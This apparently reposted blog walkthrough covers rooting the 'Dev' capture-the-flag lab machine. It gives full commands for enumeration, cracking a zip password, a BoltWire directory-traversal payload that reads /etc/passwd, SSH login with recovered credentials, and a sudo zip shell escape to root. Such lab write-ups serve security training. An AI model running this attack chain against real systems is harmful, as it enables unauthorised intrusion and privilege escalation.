EXPLOITING DEV MACHINE

Shrimper — A Small Search Engine Crafted in Rust


This walkthrough will showcase a creative approach to gaining root access on a machine. We’ll utilize an unexpected vulnerability within the zip command to escalate privileges.

After successfully setting up your dev machine, use the following details to login to the machine.

Username: root
Password: tcm

Now we need to get the IP address of the academy machine, to get that input the command:

dhclient

Enter fullscreen mode

Exit fullscreen mode

after that input the command:

ip a
Enter fullscreen mode

Exit fullscreen mode

Image description

From the above image, my IP address for academy is 192.168.59.135

Now we can ping the machine to confirm that both machines are alive and communicating.

For that we use the command:

ping 192.168.59.135 -c3

Enter fullscreen mode

Exit fullscreen mode

NB- your IP address would be different from mine so make sure to note your IP address and ping it.

Image description

The image above shows both machines can communicate as no packets were lost.

Next we run NMAP scan to search for open ports using the command:

nmap -p- -A 192.168.59.135

Enter fullscreen mode

Exit fullscreen mode

Image description

From the above scan a total of 9 ports are open, but for this lab our main targets are port 80,2049 and 8080

One of the first thing we need to do after running our scan is to visit the web page for the IP address.
NB- From our scan we have two http ports open (80 and 8080) i.e we will be visiting two web pages and the two web pages are:

192.168.59.135

and

192.168.59.135:8080

Enter fullscreen mode

Exit fullscreen mode

NB- Inputting 192.168.59.135:80 would give you the same result as 192.168.59.135

Image description

Image description

After much scanning of the webpages we didn’t really find anything there so next we need to search if we can find some hidden web directories using *ffuf. *

To do that we open two new tabs and use the command below to search on both ports webpages:

For port 80:

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.59.135/FUZZ

Enter fullscreen mode

Exit fullscreen mode

For port 8080:

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.59.135:8080/FUZZ

Enter fullscreen mode

Exit fullscreen mode

While the ffuf scan is running, we can open up a new tab and work on port 2049 which is open.

Image description

Now the NFS indicated in port 2049 means network file share, so we are curious if anything is on the file share, so we need to check and to check we use the command:

showmount -e 192.168.59.135 

Enter fullscreen mode

Exit fullscreen mode

Image description

From our search it seems there’s a directory called /srv/nfs which might contain a file.

For us to be able to get the files in that directory we need to create a directory in which we would like to save the file and then we then we mount the file.

To create a directory, input the command:

mkdir /mnt/dev 

Enter fullscreen mode

Exit fullscreen mode

To mount the file, input the command:

mount -t nfs 192.168.59.135:/srv/nfs /mnt/dev

Enter fullscreen mode

Exit fullscreen mode

Now we need to enter the /mnt/dev directory using the command:

cd /mnt/dev

Enter fullscreen mode

Exit fullscreen mode

and input the command:

ls
Enter fullscreen mode

Exit fullscreen mode

Image description

You should find only the save.zip file on yours, mine is showing 3 files because I have already unzipped the file.

To unzip the file, we input the command:

unzip save.zip

Enter fullscreen mode

Exit fullscreen mode

Image description

It is requesting for a password which we currently do not have.
There’s a tool that we can use to try and see if we would be able to crack the password of the zip file, the tool is called fcrack

To install the tool on your kali, input the command:

apt install fcrackzip

Enter fullscreen mode

Exit fullscreen mode

Image description

I already have it installed but you might not, so after successful installation input the command:

fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt save.zip

Enter fullscreen mode

Exit fullscreen mode

NB- -v means verbose because we want to see all the outputs
-u means we want to unzip the file
-D means we want to use a dictionary attack
-p is for the file we want to crack which is the save.zip

Image description

After running the command we can see we found a password which is java101

Now we need to unzip using the password.

Input the command:

unzip save.zip

Enter fullscreen mode

Exit fullscreen mode

input java101 for the password

Your file would have successfully unzipped and when you input the command *ls * you should have 3 files as seen below.

Image description

There’s a txt file and an id_rsa file, first we need to check for what is inside the txt file.
To do that we input the command:

cat todo.txt

Enter fullscreen mode

Exit fullscreen mode

Image description

We got a message from jp
We don’t know who jp is but we suspect him to be a user and we also have an id_rsa file which requires a user’s details so we can SSH into it.

So we try the command:

ssh -i id_rsa jp@192.168.182.128

Enter fullscreen mode

Exit fullscreen mode

Image description

NB- If it asks you for a fingerprint input yes

For the password we do not know what his password is, so now we are back to square one sadly.

For now… let’s move back and check our web directory search of ffuf.

So for port 80:

Image description

The lines without the # and with a status of 301 were the successful found directory.

So for port 80 six web directories were found, which are:
-public
-src
-app
-vendor
-extensions
-server-status

and for port 8080:

Image description

Two were found which are:
-dev
-server-status

So to check for the web directory for 8080 we go to our web browser and input:

http://192.168.182.128:8080/dev

Enter fullscreen mode

Exit fullscreen mode

NB- you might have noticed that my machine IP address might have changed, that’s because I switched PC, so feel free to follow along unconfused.

Image description

So we are taken to a boltwire page, I can see a register sign on the web page so I ended up registering with the username and password of hacker
So feel free to register and use any detail of your choice.

Image description

Now I move to the port 80 web directory and input the details found from ffuf.
After much enumeration, the web directory that stood out for me was the:

http://192.168.182.128/app

Enter fullscreen mode

Exit fullscreen mode

Image description

Click on the config/ directory found on the web page

Image description

Now click on the config.yml file to download the file

After downloading the file, open the file

Image description

We found a username of bolt and password I_love_java

So I tried SSH using the username and password and it was still unsuccessful

Image description

So next I went back to the bolt website which I registered as hacker

Image description

and went to google to search for boltwire exploit.

Found the one below and clicked on the webpage

Image description

Image description

Image description

To use this exploit we need to be authenticated, which we are because we already created an account with details of the hacker.

So the next step is to copy the input

index.php?p=action.search&action=../../../../../../../etc/passwd

Enter fullscreen mode

Exit fullscreen mode

and input it into our registered boltwire hacker website.

Our website looked like this

Image description

So after copying the details from the exploit page we input it to make it look like this:

Image description

So input the command on your webpage:

http://192.168.182.128:8080/dev/index.php?p=action.search&action=../../../../../../../etc/passwd
Enter fullscreen mode

Exit fullscreen mode

NB- remember to change the IP address to your machine’s IP address.

Image description

Registered users of the machine was displayed and the one which stood out for us was JP

Image description

So jp is registered as jeanpaul.

So now we ssh into the id_rsa file using the command:

ssh -i id_rsa jeanpaul@192.168.182.128

Enter fullscreen mode

Exit fullscreen mode

and for the password I tried using the I_love_java as the password

Image description

IT WAS SUCCESSFUL.

So now I input the command:

sudo -l
Enter fullscreen mode

Exit fullscreen mode

So as to find out what sudo privilege we have

Image description

And luckily we found out that we can use the command zip as a super user without having to provide a password for it.

The next step now is to find out how we can use the zip command we are given to elevate our privilege and become the root user.

For that we search google and search for gtfobins

Image description

Click on the webpage found above

Image description

Click on sudo from the web page

Image description

Scroll down, find zip and click on sudo

Image description

It will take you to the page as seen below

Image description

copy the following commands and input in the terminal logged in as jeanpaul

TF=$(mktemp -u)
Enter fullscreen mode

Exit fullscreen mode

Image description

Now input the command:


sudo zip $TF /etc/hosts -T -TT 'sh #'

Enter fullscreen mode

Exit fullscreen mode

Image description

We have successfully popped a shell.

Now input the command:

whoami
Enter fullscreen mode

Exit fullscreen mode

To find out which shell we popped

Image description

We have successfully become the root user.

Machine successfully exploited!

In conclusion, this walkthrough has demonstrated the potential danger of seemingly insignificant privileges. By exploiting an overpowered zip command, we were able to escalate access from a low-level user to a super user, highlighting the importance of thorough security assessments and the ever-present risk associated with privilege creep.



Source link
lol

By stp2y

Leave a Reply

Your email address will not be published. Required fields are marked *

No widgets found. Go to Widget page and add the widget in Offcanvas Sidebar Widget Area.